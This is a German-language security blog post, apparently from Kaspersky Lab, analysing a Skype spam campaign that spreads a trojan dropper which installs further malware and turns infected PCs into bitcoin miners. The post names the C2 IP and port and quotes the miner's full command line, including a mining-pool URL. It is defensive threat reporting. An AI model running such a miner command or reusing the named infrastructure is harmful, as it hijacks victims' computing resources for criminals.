News

Skypemageddon durch Bitcoining

Ich sage das, weil mir eine Freundin aus Venezuela, kurz nachdem ich meinen vorangegangen Post veröffentlicht hatte, einen Screenshot ihres Skype-Clients geschickt hat, mit einer in Bezug auf die Verbreitung ähnlichen Kampagne, allerdings ist sie anderen Ursprungs und dient einem anderen Zweck. Hier der Original-Screenshot:

207319969

(Übersetzung aus dem Spanischen: “ das ist mein Lieblingsbild von Dir”)

Diese Kampagne wurde am 4. April gestartet und dauert aktuell noch an:

207319970

Die durchschnittliche Klickzahl ist mit mehr als 2.000 pro Stunde ebenfalls ausgesprochen hoch. Die meisten potentiellen Opfer leben in Italien, gefolgt von Russland, Polen, Costa Rica, Spanien, Deutschland, der Ukraine und anderen.

Der ursprüngliche Dropper wird von einem Server in Indien heruntergeladen. Die Detektionsrate bei VirusTotal ist gering. Ist der Rechner einmal infiziert, so wird eine Vielzahl von anderen Schadprogrammen auf das System befördert. Die Downloads kommen von dem Dienst Hotfile.com. Gleichzeitig verbindet sich die Malware mit ihrem C2-Server, der sich in Deutschland befindet.

207319971

Die IP-Adresse des C2 lautet 213.165.68.138:9000

Und was richtet die Malware aus? Ehrlich gesagt vieles, doch am interessantesten ist, dass sie den infizierten Rechner zu einem Sklaven des Bitcoin-Generators macht. Die CPU-Auslastung steigt enorm. Hier ein Beispiel:

207319972

Der erwähnte Prozess läuft mit dem Befehl “bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX” (sensitive Daten wurden ersetzt durch XXXXXX). Er missbraucht die CPU von infizierten Rechnern, um Bitcoins für die Cyberkriminellen zu generieren.

Wie schon gesagt, ist die Kampagne recht aktiv. Wenn Sie bemerken, dass Ihr Computer schwer zu schaffen hat und alle verfügbaren CPU-Ressourcen einsetzt, so könnte das System infiziert sein.

Der Erstdropper wird von Kaspersky Lab als Trojan.Win32.Jorik.IRCbot.xkt detektiert.

Skypemageddon durch Bitcoining

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

 

Berichte

Virologie mobiler Geräte 2016

Im Jahr 2016 stieg die Zahl der Werbe-Trojaner, die in der Lage sind, Superuser-Rechte zu nutzen, weiterhin an. Im Verlauf des gesamten Jahres war das die Bedrohung Nummer eins und wir können bisher keinerlei Anzeichen für eine Trendwende in diesem Bereich erkennen.

Spam im Jahr 2016

Im Jahr 2016 haben sich in den Spam-Strömen verschiedene Veränderungen vollzogen. Die bedeutsamste Veränderung ist dabei sicherlich die Zunahme von Versendungen mit schädlichen Erpresser-Programmen. Wenn man berücksichtigt, wie relativ einfach diese Programme auf dem Schwarzmarkt zu haben sind, so wird sich diese Tendenz aller Wahrscheinlichkeit fortsetzen.

Kaspersky Security Bulletin 2016/2017. Jahresrückblick. Statistik für 2016

2016 war ein angespanntes und turbulentes Jahr im Cyberspace – von riesigen IoT-Botnets über Ransomware bis hin zu zielgerichteten Cyberspionage-Attacken, Finanzdiebstählen und Hacktivismus war alles vertreten – und sogar noch vieles mehr. Der Jahresrückblick und die Statistik für 2016 von Kaspersky Lab liefern einen detaillierten Überblick über diese Ereignisse. Die Kurzzusammenfassung finden Sie hier.

Kaspersky Security Bulletin 2016/2017. Die Ransomware-Revolution

Zwischen Januar und September 2016 hat sich die Zahl der Ransomware-Attacken auf Unternehmen verdreifacht, das ist gleichbedeutend mit einem Angriff alle 40 Sekunden. Der Markt für Ransomware-as-a-Service boomt, das Projekt NoMoreRansom wurde ins Leben gerufen: Für Kaspersky Lab ist Ransomware DAS Thema des Jahres 2016.

Abonnieren Sie unsere wöchentlichen E-Mails

Brandaktuelle Themen direkt in Ihr Postfach